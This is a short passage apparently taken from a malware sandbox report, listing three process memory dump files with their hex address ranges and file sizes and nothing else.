                                                                                                                    • memory/3620-218-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/5000-270-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/5000-163-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB